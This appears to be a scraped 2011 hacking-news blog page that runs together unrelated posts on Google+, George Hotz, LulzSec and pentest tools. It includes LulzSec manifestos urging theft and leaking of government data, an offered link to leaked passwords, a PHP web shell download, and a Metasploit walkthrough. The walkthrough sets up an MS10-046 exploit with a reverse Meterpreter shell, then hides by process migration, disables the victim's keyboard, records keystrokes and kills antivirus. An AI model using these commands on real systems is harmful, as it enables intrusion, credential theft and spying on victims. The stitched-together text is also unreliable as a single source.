Google Inc is making its boldest move to take on Facebook in the fast-growing social networking market and to maintain its dominance on the Web. Google, which has been frustrated by a string of failed attempts to crack the social networking market, introduced a full-fledged social network on Tuesday dubbed Google+ ( It is the company's biggest foray into social networking since co-founder Larry Page took over as chief executive in April.
Page has made social networking a top priority at the world's No. 1 Internet search engine, whose position as the main gateway to online information could be at risk as people spend more time on sites like Facebook and Twitter. "They had the luxury of making mistakes in the past with their social initiatives. They don't really have that luxury now," said Ray Valdes, an analyst at research firm Gartner, referring to Google. "Companies that are successful with the social web will get the page views, they'll get the engagement and they'll eventually get the advertising dollars that are so important to Google," he said.
Google+ (Google Plus), now available for testing, is structured in remarkably similar fashion to Facebook, with profile pictures and newsfeeds forming a central core. However, a user's friends or contacts are grouped into very specific circles of their choosing, versus the common pool of friends typical on Facebook.
Enticing consumers to join another social networking service will not be easy, said Rory Maher, an analyst with Hudson Square Research. "They're going to have an uphill battle due to Facebook's network effects," said Maher, citing the 700 million users that some research firms say are currently on Facebook's service.
"The more users they (Facebook) get, the harder it gets for Google to steal those," he said. But he added that Google's popularity in Web search and email could help it gain a following.
To set its service apart from Facebook, Google is betting on what it says is a better approach to privacy - a hot-button issue that has burned Facebook, as well as Google, in the past.
Central to Google+ are the "circles" of friends and acquaintances. Users can organize contacts into different customized circles - family members, coworkers, college friends - and share photos, videos or other information only within those groups.
"In the online world there's this 'share box' and you type into it and you have no idea who is going to get that, or where it's going to land, or how it's going to embarrass you six months from now," said Google Vice President of Product Management Bradley Horowitz. "For us, privacy isn't buried six panels deep," he added.
Facebook, which has been criticized for its confusing privacy controls, introduced a feature last year that lets users create smaller groups of friends. Google, without mentioning Facebook by name, said other social networking services' attempts to create groups have been "bolt-on" efforts that do not work as well. Notifications:-
Google homepage also is changed with black border ..looks plesant to eye , rather than full white..
Google+ , any competition is good for us.. I like google to integrate or open up pics of its member to friends more than facebook... Orkut went down because it locked all the photos ... Orkut picked up because you can see girls pics.. currently what facebook offers in a limited way :-p
New York - The 21-year-old computer whiz whose legal tussle with Sony triggered one of the largest assaults by the hacker community on a single company has found himself a steady job - with Facebook. George Hotz became a star among hackers under the internet pseudonym name GeoHot when he “unlocked” Apple's iPhone and then the Sony PlayStation games console. He posted details of how to alter software on the devices so that tech-savvy users could use them for unauthorised games and other applications.
Facebook swooped to hire Mr Hotz last month, just weeks after he settled the lawsuit from Sony that so enraged fellow hackers that they launched an attack on the company that has cost it tens of millions of dollars to date.
The social networking giant has not said what Mr Hotz will be working on, though there was speculation he could be involved in building anti-hacker defences at Facebook, or in the company's plans to develop a rival to Apple's App Store for software downloads.
Mr Hotz is straight out of hacker central casting, a teenage computer genius who grew up in New Jersey and was identified early as a talented youngster, attending a special programme for bright children from the US state school system. He led his school in national robot-building championships and appeared on national television demonstrating his creations.
It was in 2008 that he achieved fame in the hacker community for conducting the first so-called “jailbreak” of an Apple iPhone. His hack allowed users to get round Apple's tight controls on what apps can be downloaded to the phone and which mobile phone networks it can be used on.
And then in 2009 and 2010, he chronicled on his blog his attempts to similarly unlock Sony's PlayStation 3 console, and earlier this year he posted “root keys” for the PS3 so that others could emulate his work and build homegrown software on the device. Sony launched a lawsuit days later, saying Mr Hotz was encouraging the use of pirated games.
In an interview on the cable TV channel G4, Mr Hotz put himself in the tradition of radio hams of old and said he was fighting for the right for computer fans to tinker with their equipment. “This is about a lot more than what I did and me,” he said of the lawsuit. “It's about whether you really own that device that you purchase.”
Facebook's decision to hire Mr Hotz sends a powerful signal that it will be a welcoming employer for the brightest engineers. Google bosses last year said they were in a “war for talent” with Facebook and other Silicon Valley firms, and the war is only likely to hot up now that money is flowing into the technology industry from investors keen to find the next Facebook.
As Mr Hotz was yesterday ensconced in his new role, the fallout from his actions continued to reverberate. Sir Howard Stringer, the British businessman who runs Sony, faced calls for his resignation at the Japanese firm's annual shareholder meeting.
The company was forced to temporarily shut down its PlayStation Network of online games after disclosing in April that hackers had accessed personal information on 77 million of its customers, potentially including their credit card details.
Sir Howard said on Tuesday that the company had been the victim of a revenge attack by supporters of Mr Hotz. “We believe that we first became the subject of attack because we tried to protect our intellectual property, our content, in this case videogames,” he said. - The Independent
Hacker group LulzSec, it appears, is through with its “anarchic lulz”, announcing today via Pastebin (of course) that it’s quitting after fifty days of activity.
“For the past 50 days we’ve been disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could,” the group notes. “While we are responsible for everything that The Lulz Boat is, we are not tied to this identity permanently.”
“Our planned 50 day cruise has expired, and we must now sail into the distance, leaving behind – we hope – inspiration, fear, denial, happiness, approval, disapproval, mockery, embarrassment, thoughtfulness, jealousy, hate, even love.”
In the last fifty days LulzSec hacking major targets including among its most notable victims Sony and the US Senate. On Friday the group claimed in a BBC news interview to have received over $18,000 of donations. While the group has never been publicly identified, in its final statement it states it consists of a “crew of six”.
The group encourages in their last tweet who wants to join the ‘AntiSec’ movement to turn to Anonymous.
If LulzSec is telling the truth and this really is the end, it’s gone out with what seems like a bang. A torrent file posted to The Pirate Bay points to a 457.84MB download which contain information that includes AOL internal data, AT&T internal data and the “FBI being silly” among its contents. The full list is:
The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
Official change log:
Added to support both Linux and OSX for the SET Interactive Shell, uses same code repository
Added shell to support Linux/OSX for SET Interactive Shell
Added download to support Linux/OSX for SET Interactive Shell
Added upload to support Linux/OSX for SET Interactive Shell
Added ps to support Linux/OSX for SET Interactive Shell
Added kill to support Linux/OSX for SET Interative Shell
Fixed a bug in mass mailer where TLS would execute after ehlo not before. Thanks pr1me
Changed download path to replace forward and back slashes with a _ so it would not cause strange nix issues with back slashes and forward slashes in the SET Interactive Shell
Added better integer handling when running by itself without specifying a port
Redesignated filename shell.binary to and shell.linux (PE vs. ELF binary)
Added separate installers for shell.linux and shell.osx, to many differences between the two and needed different compiling.
Added instructions in how to compile for each flavor operating system including windows, linux, and osx
Added reboot now into the SET interactive Shell
Added persistence to the SET interactive shell with a completely custom written python-bytecompiled service. Essentially uploads service to victim, that calls interactive shell every 30 minutes
Added name distinguishing per windows/posix systems so it will show up POSIX or WINDOWS on interactive shell, will also show WINDOWSUAC-SAFE and WINDOWSSYSTEM.
Added the MS11-050 IE mshtml!CObjectElement Use After Free exploit from Metasploit
Added dynamic packing to download/upload for persistence, better AV avoidance
Added MS11-050, Adobe Flash, and Cisco AnyConnect Metasploit exploits to the SET web gui
Added ‘clear’ and ‘cls’ in the SET Interactive Menu to remove whats in the screen, etc.
When using the java docbase exploit, removed ‘Client Login’ for title frame, isn’t needed
Added back command to the SET interactive shell to go back when in different menus
Fixed a bug where it would state payloadprep not defined, it was caused to UPX not fully packing the device at time of upload, a 3 second delay has been added
The C7 crew found new XSS vulnerability on Sony playstation. That means Sony is still not safe. Why cant they spend some bucks to fix all these bugs? Sony was hacked more than 20 times last month and this shows that Sony is still not secure and hackable.
Lulzsec member's website got defaced by Team Poison today. is the defaced website and defaced link is removed. The defaced website is a personal blog of one of the lulzsec member.
Message by Team Poison to Lulzsec:
"No matter how many bots you gather, no matter how much people you lie to, no matter how much pre-made tools you use, you will _NEVER_ represent the real hacking scene, we warned you, we told you we do not make empty threats, we gave u 48hrs to secure your ircs yet u failed to do so, instead u posted hashes from public forums and then claimed you doxed us and laughed at the fact that i was 17years old. stop telling yourself that u are hackers, putting a ip into a irc is NOT hacking nor is using pre-made tools and scripts to grab databases… you do not represent the anti-sec movement, u are not allowed to greet underground groups like zf0, ab, h0n0, el8 like your member “AnonSabu” was doing, you will never be apart of the underground scene, if anyone thinks you are underground and can actually hack they have no idea about what happens in the underground scene. oh and TeaMp0isoN Issue 2 is coming out VERY soon exposing lulzsec members (pictures, addresses, passwords, ips, phone numbers etc). . . . not so anonymous anymore are you? lets hope that you can swim because the lulzboat just got titanic’d…"
The Metasploit® Framework is a free, open source penetration testing solution developed by the open source community & Rapid7. 11 new exploits, 1 new auxiliary module, and 15 new post modules have been added since the last release.
New Features:
Remote registry commands for Meterpreter
Import parsers moved to nokogiri streaming parsers (for quicker parsing of large XML files)
Updates to the egghunter payload to help the payload bypass DEP.
Lulzsec and Anonymous have declared full open war against all governments, banks and big corporations in the world. They are calling all hackers in the world to unite. Their objective is to fully expose all corruptions and the secrets
The Official Statement Said-
Salutations Lulz Lizards,
As we're aware, the government and whitehat security terrorists across the world continue to dominate and control our Internet ocean. Sitting pretty on cargo bays full of corrupt booty, they think it's acceptable to condition and enslave all vessels in sight. Our Lulz Lizard battle fleet is now declaring immediate and unremitting war on the freedom-snatching moderators of 2011.
Welcome to Operation Anti-Security (#AntiSec) - we encourage any vessel, large or small, to open fire on any government or agency that crosses their path. We fully endorse the flaunting of the word "AntiSec" on any government website defacement or physical graffiti art. We encourage you to spread the word of AntiSec far and wide, for it will be remembered. To increase efforts, we are now teaming up with the Anonymous collective and all affiliated battleships.
Whether you're sailing with us or against us, whether you hold past grudges or a burning desire to sink our lone ship, we invite you to join the rebellion. Together we can defend ourselves so that our privacy is not overrun by profiteering gluttons. Your hat can be white, gray or black, your skin and race are not important. If you're aware of the corruption, expose it now, in the name of Anti-Security.
Top priority is to steal and leak any classified government information, including email spools and documentation. Prime targets are banks and other high-ranking establishments. If they try to censor our progress, we will obliterate the censor with cannonfire anointed with lizard blood.
It's now or never. Come aboard, we're expecting you...
Ani-Shell is a simple PHP shell with unique features like Mass Mailer , A simple Web-Server Fuzzer , and a DDoser. Ani-shell has immense capabilities and have been written with some coding standards in mind for better editing and customization.
As it is writeen in PHP it is OS independent and also uses less resources. It is just the first edition of the Ani-shell we hope there are many improments and additions. DownloadAni-Shell v1.0 (ani-shellv1.0.rar)here
Today lulzsec made a press release as they hit 1000th tweets. Lulzsec says, they are hacking websites just for fun.
The below shown is the press release made by lulzsec.
Dear Internets,
This is Lulz Security, better known as those evil bastards from twitter. We just hit 1000 tweets, and as such we thought it best to have a little chit-chat with our friends (and foes).
For the past month and a bit, we've been causing mayhem and chaos throughout the Internet, attacking several targets including PBS, Sony, Fox, porn websites, FBI, CIA, the U.S. government, Sony some more, online gaming servers (by request of callers, not by our own choice), Sony again, and of course our good friend Sony.
While we've gained many, many supporters, we do have a mass of enemies, albeit mainly gamers. The main anti-LulzSec argument suggests that we're going to bring down more Internet laws by continuing our public shenanigans, and that our actions are causing clowns with pens to write new rules for you. But what if we just hadn't released anything? What if we were silent? That would mean we would be secretly inside FBI affiliates right now, inside PBS, inside Sony... watching... abusing...
Do you think every hacker announces everything they've hacked? We certainly haven't, and we're damn sure others are playing the silent game. Do you feel safe with your Facebook accounts, your Google Mail accounts, your Skype accounts? What makes you think a hacker isn't silently sitting inside all of these right now, sniping out individual people, or perhaps selling them off? You are a peon to these people. A toy. A string of characters with a value.
This is what you should be fearful of, not us releasing things publicly, but the fact that someone hasn't released something publicly. We're sitting on 200,000 Brink users right now that we never gave out. It might make you feel safe knowing we told you, so that Brink users may change their passwords. What if we hadn't told you? No one would be aware of this theft, and we'd have a fresh 200,000 peons to abuse, completely unaware of a breach.
Yes, yes, there's always the argument that releasing everything in full is just as evil, what with accounts being stolen and abused, but welcome to 2011. This is the lulz lizard era, where we do things just because we find it entertaining. Watching someone's Facebook picture turn into a penis and seeing their sister's shocked response is priceless. Receiving angry emails from the man you just sent 10 dildos to because he can't secure his Amazon password is priceless. You find it funny to watch havoc unfold, and we find it funny to cause it. We release personal data so that equally evil people can entertain us with what they do with it.
Most of you reading this love the idea of wrecking someone else's online experience anonymously. It's appealing and unique, there are no two account hijackings that are the same, no two suddenly enraged girlfriends with the same expression when you admit to killing prostitutes from her boyfriend's recently stolen MSN account, and there's certainly no limit to the lulz lizardry that we all partake in on some level.
And that's all there is to it, that's what appeals to our Internet generation. We're attracted to fast-changing scenarios, we can't stand repetitiveness, and we want our shot of entertainment or we just go and browse something else, like an unimpressed zombie. Nyan-nyan-nyan-nyan-nyan-nyan-nyan-nyan, anyway...
Nobody is truly causing the Internet to slip one way or the other, it's an inevitable outcome for us humans. We find, we nom nom nom, we move onto something else that's yummier. We've been entertaining you 1000 times with 140 characters or less, and we'll continue creating things that are exciting and new until we're brought to justice, which we might well be. But you know, we just don't give a living fuck at this point - you'll forget about us in 3 months' time when there's a new scandal to gawk at, or a new shiny thing to click on via your 2D light-filled rectangle. People who can make things work better within this rectangle have power over others; the whitehats who charge $10,000 for something we could teach you how to do over the course of a weekend, providing you aren't mentally disabled.
This is the Internet, where we screw each other over for a jolt of satisfaction. There are peons and lulz lizards; trolls and victims. There's losers that post shit they think matters, and other losers telling them their shit does not matter. In this situation, we are both of these parties, because we're fully aware that every single person that reached this final sentence just wasted a few moments of their time.
Thank you, bitches. Lulz Security
What if lulzsec gona continue this? This will affect common people too right? What you think? Comment on it!
Adobe has rolled out security updates for its widely used PDF Reader and Flash animation.Some hackers have been exploiting these to hijack user computers.
The emergency patch for Flash was the second time in nine days that Adobe has rushed out a fix for a serious bug in the program. The vulnerability allows attackers to remotely execute malicious code on machines that run the software, and there are reports it's being actively exploited.
The targeted vulnerability resides in Flash versions for Windows, Macintosh, Linux, Solaris and the Android mobile operating system. Tuesday's fix is available for all platforms except for Android.A separate update for Reader fixes at least 13 bugs. Adobe rated 11 of them "critical," a designation typically reserved for vulnerabilities that can be exploited with little or no interaction required by the user to install malware. The flaws involved memory corruption, buffer and heap overflows, DLL load hijacking and other bugs.
Flash and Reader are among the most commonly targeted apps by criminals pushing malware. Users are better off using an alternative PDF reader such as Foxit. While the application has its share of security vulnerabilities, its smaller market share means it's mostly ignored by attackers.
Are you sure your Email/Password is safe? Want to know whether your passwords leaked or not? launched a searchable database using which you can search whether your email/passwords is leaked or not.
Yesterday Lulzsec released Email/Passwords of 62,000 people obtained from various sources. Reports say the list includes login information for websites like Paypal, Facebook, Gmail, and even some online multipplayer gamers Etc.
Today, another gaming company had fallen victim to a successful cyber attack. Gaming company Bioware is hacked, but no credit card data was compromised says the company.
"However hackers may have obtained information such as user account names and passwords, email addresses, and birth dates of approximately 18,000 accounts--a very small percentage of total users." said Bioware.
Its the 7th attack on a gaming company this month.
LulzSec leaked over 62,000 accounts containing emails and passwords obtained from random sources. LulzSec announced this leak through their twitter posts. The file had already downloaded 3200+ times says lulzec. Some sources says that the leaked email/passwords are from the database of
The mediafire link where they uploaded the email/passwords is removed now.
For those who are looking for the leaked passwords/emails, dont worry. Here is the leaked account details. Click here .
Welcome to the Metasploit Basics Part 3. In this part i will show you a live example of how to own a PC with some exploit and what to do after the Meterpreter session is opened. In short i will explain you about the Meterpreter.
The beauty of the Meterpreter is that it runs by injecting itself into the vulnerable running process on the remote system once exploitation occurs. All commands run through Meterpreter also execute within the context of the running process.
Meterpreter short form Meta-Interpreter .The Meterpreter is one of the advanced payloads available with the MSF. The way to look at the Meterpreter is not simply as a payload, but rather as an exploit platform that is executed on the remote system.The Meterpreter has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited short the meterpreter helps us to overcome the limitations and disadvantages of a individual payload like the adduser payload
I will be using my localhost and my virtual machine to demonstrate this so that you can understand better.I will own a XP box with my Backtrack and Metasploit. Unfortunately my XP was a patched version so i thought to use one exploit which gives a better chance to own a PC
msf > use windows/browser/ms10_046_shortcut_icon_dllloader msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms10_046_shortcut_icon_dllloader) > set lhost ( your ip :P ) lhost => msf exploit(ms10_046_shortcut_icon_dllloader) > set srvhost ( localhost to listen on) srvhost =>
Now i type exploit and the server starts ..
Now it up to you to do some clever social engineering regarding the situation your in.Give the Ip in which we have to give the [*] Using URL : to the victim ( This is just my Local Host IP . If you are using Backtrack and metasploit on a virtual machine your ip will be 192.***.***.*** which may vary . Note- You cannot use this globally or over internet unless you forward your ip on the virtual machine. If you are using it as your Host OS or Live then on connect to the internet the ip becomes your your ISP ip which can be used over internet ) Have a look here
Now within a second this becomes ..
Ok now Part 1 and Part 2 have been shown practically. Time for Part 3 to start
Type in sessions to make sure we have an active session. Once we know we have one type in seesions -i and the id number next to the session you want to interact with.
We are in the meterpreter shell now we can do a lot of things there.
Now lets see the list of available commands in our meterpreter
meterpreter > help
Core Commands =============
Command Description ------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands ============================
Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory del Delete the specified file download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory
Command Description ------- ----------- ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table
Stdapi: System Commands =======================
Command Description ------- ----------- clearev Clear the event log drop_token Relinquishes any active impersonation token. execute Execute a command getpid Get the current process identifier getprivs Attempt to enable all privileges available to the current process getuid Get the user that the server is running as kill Terminate a process ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry rev2self Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands ===============================
Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface components
Stdapi: Webcam Commands =======================
Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_list List webcams webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands ======================
Command Description ------- ----------- getsystem Attempt to elevate your privilege to that of local system.
Time Won't Allow me to explain all functions bit by bit . I will just brief it
Every time i break into a box i prefer seeking more information about i.So i type
meterpreter > sysinfo Computer : SAURAV-79E14E1B OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32
Impressive isn't it ?
Next I always migrate to a new process in order to hide myself. Be sure to choose something that is always running or you may get cut off. type the ps command to find out whats running.
Now to see a list of processes running i type ps
Now i migrate to another by typing migrate PID .. ex meterpreter > migrate 416 [*] Migrating to 416... [*] Migration completed successfully.
You can also disable the keyboard and the mouse and then re enable them.
meterpreter > uictl disable keyboard
Disabling keyboard...
meterpreter > uictl disable mouse
Disabling mouse...
meterpreter > uictl enablemouse
Enabling mouse...
meterpreter > uictl enablekeyboard
Enabling keyboard...
Now lets see how to sniff Keystrokes /m\ Commands in use keyscan_dump keyscan_start keyscan_stop
I made a very small video demonstrating this
The networking commands also help us a lot in the game
When i type the ipconfig command the meterpreter shows me all the network IPs to me.
meterpreter > ipconfig
WAN (PPP/SLIP) Interface Hardware MAC: 00:5*:45:00:00:00 IP Address : 5*.1**.1**.2 Netmask :
MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : Netmask :
VMware Virtual Ethernet Adapter for VMnet1 Hardware MAC: 00:50:56:c5:00:01 IP Address : Netmask :
VMware Virtual Ethernet Adapter for VMnet8 Hardware MAC: 00:50:56:c0:00:08 IP Address : Netmask :
Using the System Commands .... This video will demonstrates some of the system commands at work when i try to download one file edit it and then upload it into a folder in the victims computer
Metasploit also allows you to use script on the victim from the meterpreter shell.Metasploit is coded in ruby so ruby scripts works well.There are a number of scripts already included in Metasploit if you know Ruby you can write your scripts also. i will not cover all the scripts but some
killav.rb (kills all anti viruses running on system) getcountermeasure.rb (kills av’s and fw’s/ids’) gettelnet.rb (able to open a telnet server on the customer with a username and password) checkvm.rb (checks to see if it is a VM. And version numbers) keylogrecorder.rb ( Records Keystroke ) netenum.rb search_dwld.rb winbf.rb credcollect.rb hostsedit.rb remotewinenum.rb scheduleme.rb schtasksabuse.rb wmic.rb get_local_subnets.rb migrate.rb ...... more
So lets run a some scripts so you understand the idea of what game is on
meterpreter > run killav [*] Killing Antivirus services on the target
[*] Killing off Monitor.exe
meterpreter > run checkvm [*] Checking if target is a Virtual Machine
[*] It appears to be physical host. meterpreter >
P.S - you can type script -h to get the available help from the script ex - run scraper -h
meterpreter > run keylogrecorder [*] firefox.exe Process found, migrating into 1812 [*] Migration Successful!! [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf3/logs/keylogrecorder/ [*] Recording ...
The strokes are saved to a database on the attackers machine for reference at a later date.
You can try the rest commands on your own. Time and Blogger wont permit me to explain more because this have become a large one. So Any suggestions , Praises are welcomed
---kudos to rapid7 community for such a good tool metasploit.---
Blackbuntu is a Penetration Testing Distro based on Ubuntu 10.10.which was specially designed for security training students and practitioners of information security.
The Metasploit team is excited to announce a new incentive for community exploit contributions: Cash! Running until July 20th, their Exploit Bounty program will pay out $5,000 in cash awards (in the form of American Express gift cards) to any community member that submits an accepted exploit module for an item from their Top 5 or Top 25 exploit lists. This is their way of saying thanks to the open source exploit development community and encouraging folks who may not have written Metasploit modules before to give it a try.
All accepted submissions will be available under the standard Metasploit Framework license (3-clause BSD). Exploit selection is first-come, first-serve; please see the official rules for more information.
Contributors will have a chance to claim a vulnerability from the Top 25 ($100) and Top 5 ($500) lists. Once a vulnerability has been claimed the contributor will be given one week to work on a module. After a week the vulnerability will be open again to the community. Prizes will only be paid out to the first module contributor for a given vulnerability. The process of claiming a vulnerability is an attempt at limiting situations where multiple contributors submit modules for the same vulnerability. To stake a claim, send an email to with the name of the vulnerability from the list below. All claims will be acknowledged, so please wait until receiving the acknowledgement before starting on the exploit. Each contributor can only have one outstanding claim at a time.
If you need help with the Metasploit module format, feel free to drop by the IRC channel (#metasploit on, and take a look at the some of the community documents:
1. Choose an exploit from the list below that has an empty Owner field. 2. Email and wait for an ackknowledgement of your claim. 3. Within one week, submit an exploit module to the Metasploit Redmine tracker as a new ticket with attachment. 4. Receive feedback on the module via Redmine and acceptance status.
All submissions must come from the Top 25 or Top 5 lists below
All exploits should be submitted to Metasploit Redmine. 1 ticket per exploit.
Modules MUST conform to the HACKING style guidelines
Should work reliably on all targets listed in the module.
Payment The program ends July 20th, this is the submission deadline for modules to be considered for the contest. Payment will be in the form of American Express gift cards sent within 60 days from the end of the program.